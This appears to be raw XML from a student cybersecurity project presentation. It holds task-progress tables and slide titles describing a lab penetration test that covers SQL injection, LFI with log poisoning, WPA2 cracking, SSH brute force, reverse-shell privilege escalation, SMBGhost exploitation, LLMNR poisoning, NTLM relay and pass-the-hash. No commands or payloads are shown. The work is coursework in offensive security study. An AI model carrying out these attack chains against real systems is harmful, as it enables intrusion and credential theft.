                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4348285">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2568349">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="849912">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3100" b="1" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Task </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="124812" marR="483440" marT="35661" marB="267455"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noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3100" b="1" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Progress</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="124812" marR="483440" marT="35661" marB="267455" anchor="b">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10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="731043">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2300" i="1" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Windows exploit and setup</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="124812" marR="483440" marT="35661" marB="267455">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lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2300" b="0" i="1" u="none" strike="noStrike" cap="none" spc="0" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2300" cap="none" spc="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="124812" marR="483440" marT="35661" marB="26745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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1087649">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2300" b="0" i="1" u="none" strike="noStrike" cap="none" spc="0" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Active Directory Exploit and setup</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2300" cap="none" spc="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="124812" marR="483440" marT="35661" marB="267455">
                    <a:lnL w="9525"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300" i="1" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="124812" marR="483440" marT="35661" marB="26745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731043">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2300" i="1" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Presentation</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="124812" marR="483440" marT="35661" marB="267455">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2300" i="1" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="124812" marR="483440" marT="35661" marB="26745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r h="731043">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2300" i="1" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Report</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="124812" marR="483440" marT="35661" marB="267455">
                    <a:lnL w="9525"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lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2300" b="0" i="1" u="none" strike="noStrike" cap="none" spc="0" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="124812" marR="483440" marT="35661" marB="26745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3539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338" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6420465" y="609600"/>
            <a:ext cx="5122606" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Task Allocation and Progress</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6420465" y="2666999"/>
            <a:ext cx="5122606" cy="3216276"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1"/>
              <a:t>Haziq Hafizhan</a:t>
            </a:r>
          </a:p>
          <a:p>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1244727447"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="643192" y="915663"/>
          <a:ext cx="5451628" cy="4706634"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:solidFill>
                  <a:srgbClr val="F7F7F7"/>
                </a:solidFill>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3256274">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2195354">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="822504">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" cap="all" spc="60">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Task </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="228473" marR="228473" marT="228473" marB="228473">
                    <a:lnL w="12700" cmpd="sng">
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR w="12700" cmpd="sng">
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT w="12700" cmpd="sng">
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB w="38100" cmpd="sng">
                      <a:noFill/>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" cap="all" spc="60">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Progress</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="228473" marR="228473" marT="228473" marB="228473">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r h="695591">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2700" b="0" i="1" u="none" strike="noStrike" cap="none" spc="0" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Building of Website </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2700" cap="none" spc="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="152315" marR="152315" marT="76174" marB="152315">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US" sz="2700" i="1" cap="none" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="152315" marR="152315" marT="76174" marB="152315">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10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="695591">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2700" i="1" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Injection SQL</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="152315" marR="152315" marT="76174" marB="152315">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2700" i="1" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="152315" marR="152315" marT="76174" marB="152315">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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1101766">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2700" i="1" cap="none" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Local Privilege Escalation</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="152315" marR="152315" marT="76174" marB="152315">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2700" i="1" cap="none" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="152315" marR="152315" marT="76174" marB="152315">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0004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="695591">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2700" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Presentation </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="152315" marR="152315" marT="76174" marB="152315">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2700" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="152315" marR="152315" marT="76174" marB="152315">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5"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="695591">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2700" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Report</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="152315" marR="152315" marT="76174" marB="152315">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2700" cap="none" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="152315" marR="152315" marT="76174" marB="152315">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95615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619A66209EDD4FA032EEBEF7EE9024" ma:contentTypeVersion="4" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="ad4f72395271a9ee7c772df971c05ea6">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="84ee2212-70c8-4d17-8090-fd3b779e1aaf" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="403949480af7d6d669198514138717f8" ns2:_="">
    <xsd:import namespace="84ee2212-70c8-4d17-8090-fd3b779e1a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ee2212-70c8-4d17-8090-fd3b779e1a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31269A-62A8-49D9-BD34-2EC9AAA46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ee2212-70c8-4d17-8090-fd3b779e1a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316A59-61B6-4D7F-9C44-558F15EEFDB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E997D9D-D7C8-4F97-9512-215A854D50BA}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>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emplate>Ion Boardroom</Template>
  <TotalTime>346</TotalTime>
  <Words>2914</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>323</Paragraphs>
  <Slides>69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Aptos</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Google Sans</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Mesh</vt:lpstr>
      <vt:lpstr>C300 Final Evaluation </vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Project Specification</vt:lpstr>
      <vt:lpstr>Project Specification</vt:lpstr>
      <vt:lpstr>Business Analysis</vt:lpstr>
      <vt:lpstr>Task Allocation and Progress</vt:lpstr>
      <vt:lpstr>Task Allocation and Progress</vt:lpstr>
      <vt:lpstr>Task Allocation and Progress</vt:lpstr>
      <vt:lpstr>Task Allocation and Progress</vt:lpstr>
      <vt:lpstr>Records of Team Meetings with Supervisor</vt:lpstr>
      <vt:lpstr>Prototype Walk Through / Demonstration </vt:lpstr>
      <vt:lpstr>Web Application</vt:lpstr>
      <vt:lpstr>SQLi </vt:lpstr>
      <vt:lpstr>Check for the db details in the search bar.</vt:lpstr>
      <vt:lpstr>Find the names of tables in the DB</vt:lpstr>
      <vt:lpstr>Find the coloum names in the table user</vt:lpstr>
      <vt:lpstr>Find the user id and role, to find the admin</vt:lpstr>
      <vt:lpstr>Login as Admin</vt:lpstr>
      <vt:lpstr>Local file incusion (LFI)</vt:lpstr>
      <vt:lpstr>LFI</vt:lpstr>
      <vt:lpstr>LFI , logs/access.log</vt:lpstr>
      <vt:lpstr>LFI,  Inject malicious code to run commands on the web-server.</vt:lpstr>
      <vt:lpstr>Log poisoning</vt:lpstr>
      <vt:lpstr>RCE, Log Poisoning</vt:lpstr>
      <vt:lpstr>SUDO privilege escalation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Wireless WPA2 cracking</vt:lpstr>
      <vt:lpstr>Check the adapter mode</vt:lpstr>
      <vt:lpstr>Kill all the wireless processes</vt:lpstr>
      <vt:lpstr>Change adapter to monitor mode.</vt:lpstr>
      <vt:lpstr>Check for the available networks.</vt:lpstr>
      <vt:lpstr>Check for the connections in the target network.</vt:lpstr>
      <vt:lpstr>Deauthenticate a connected user.  Also capture the network packets.</vt:lpstr>
      <vt:lpstr>Use aircrack-ng to crack the password.</vt:lpstr>
      <vt:lpstr>SSH VULNERABILITY</vt:lpstr>
      <vt:lpstr>Nmap to find the open port and version</vt:lpstr>
      <vt:lpstr>Vulnerability</vt:lpstr>
      <vt:lpstr>Try to enumerate username </vt:lpstr>
      <vt:lpstr>Vulnerability</vt:lpstr>
      <vt:lpstr>Use hydra bruteforce password</vt:lpstr>
      <vt:lpstr>Login using SSH</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Check for any cron job running as root</vt:lpstr>
      <vt:lpstr>Use revershell command for privilege escalation</vt:lpstr>
      <vt:lpstr>Finally successfully loggined as root</vt:lpstr>
      <vt:lpstr>Windows Attack </vt:lpstr>
      <vt:lpstr>Scanning the Internal Network </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>IP address Allocations for the attack</vt:lpstr>
      <vt:lpstr>RECONNAISSANCE ON THE WINDOWS MACHINES </vt:lpstr>
      <vt:lpstr>SMB GHOST vulnerability Affected system</vt:lpstr>
      <vt:lpstr>Conducting further reconnaissance on the machine vulnerable to the SMB Ghost exploit. </vt:lpstr>
      <vt:lpstr>Smb ghost</vt:lpstr>
      <vt:lpstr>Exploitation On Windows 10 SMB Ghost vulnerable machine. </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Post-Exploitation: Gaining More Access</vt:lpstr>
      <vt:lpstr>Pass-the-Credential Attack via RDP</vt:lpstr>
      <vt:lpstr>Attack On Active Directory Using the LLMNR/NBT-NS Poisoning. </vt:lpstr>
      <vt:lpstr>LLMNR/NBT-NS Poisoning </vt:lpstr>
      <vt:lpstr>Attack On Active Directory Using the LLMNR/NBT-NS Poisoning combined with NTLM Relay Attack. </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Pass-the-Hash Attack on Active Directory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AMAL SURESH</dc:creator>
  <cp:lastModifiedBy>SREERAJ VAKKATTU SUNIL</cp:lastModifiedBy>
  <cp:revision>38</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-19T17:24:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-14T12:15:16Z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0x01010016619A66209EDD4FA032EEBEF7EE9024</vt:lpwstr>
  </property>
</Properties>
</file>